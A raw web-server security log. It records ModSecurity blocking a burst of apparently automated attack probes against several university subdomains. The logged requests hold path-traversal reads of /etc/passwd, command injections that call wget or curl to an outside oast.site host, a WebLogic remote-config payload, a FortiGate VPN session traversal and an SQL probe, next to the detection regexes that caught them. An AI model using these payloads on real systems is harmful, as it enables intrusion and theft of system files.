[Tue Aug 29 11:31:06.367117 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQSWJUAAAA0"]
[Tue Aug 29 11:31:06.387690 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQP64IAAAAx"]
[Tue Aug 29 11:31:06.389716 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQOvzEAAAAw"]
[Tue Aug 29 11:31:06.391229 2023] [:error] [pid 1031] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQHAj8AAAAp"]
[Tue Aug 29 11:31:06.391912 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQQyicAAAAy"]
[Tue Aug 29 11:31:06.392333 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQDFRUAAAAl"]
[Tue Aug 29 11:31:06.394631 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQIS6sAAAAq"]
[Tue Aug 29 11:31:07.312413 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgk3owdug9w317w.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAP-LNMAAAAe"]
[Tue Aug 29 11:31:07.360202 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgku4843ywmi7hd.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQEGFkAAAAm"]
[Tue Aug 29 11:31:08.302757 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQLC@4AAAAt"]
[Tue Aug 29 11:31:08.307181 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQFcPkAAAAn"]
[Tue Aug 29 11:31:08.307964 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQP64cAAAAx"]
[Tue Aug 29 11:31:08.313406 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQSWJoAAAA0"]
[Tue Aug 29 11:31:08.313519 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAP@MwkAAAAZ"]
[Tue Aug 29 11:31:08.350637 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQR43AAAAAz"]
[Tue Aug 29 11:31:09.091039 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgzwttt8khm8p13.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQP64gAAAAx"]
[Tue Aug 29 11:31:09.092473 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgahxbhgtupk78k.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAPLwDcAAAAX"]
[Tue Aug 29 11:31:09.098592 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgrmhwrue45cs8r.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP8GyIAAAAV"]
[Tue Aug 29 11:31:09.099008 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg3p643as4zi6px.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAO88AQAAAAF"]
[Tue Aug 29 11:31:09.103859 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg4814sy15zr8d5.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAPMmGYAAAAY"]
[Tue Aug 29 11:31:09.317393 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgnr87c3nuqbpjq.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP8GyMAAAAV"]
[Tue Aug 29 11:31:10.331840 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgconk6611i9fsq.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPRNfYAAAAf"]
[Tue Aug 29 11:31:10.332682 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgpcp6cgy6fhorp.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQSWJ0AAAA0"]
[Tue Aug 29 11:31:10.334830 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg38938py98d3sb.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQR43IAAAAz"]
[Tue Aug 29 11:31:10.343518 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAPMmGkAAAAY"]
[Tue Aug 29 11:31:10.359524 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQCvzoAAAAk"]
[Tue Aug 29 11:31:10.363022 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQEGF4AAAAm"]
[Tue Aug 29 11:31:10.364319 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQSWJ4AAAA0"]
[Tue Aug 29 11:31:10.365483 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQJWqQAAAAr"]
[Tue Aug 29 11:31:10.388727 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQUH9gAAAA2"]
[Tue Aug 29 11:31:10.391440 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg9mt3qwmuo476f.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQJWqUAAAAr"]
[Tue Aug 29 11:31:10.394447 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQCvzsAAAAk"]
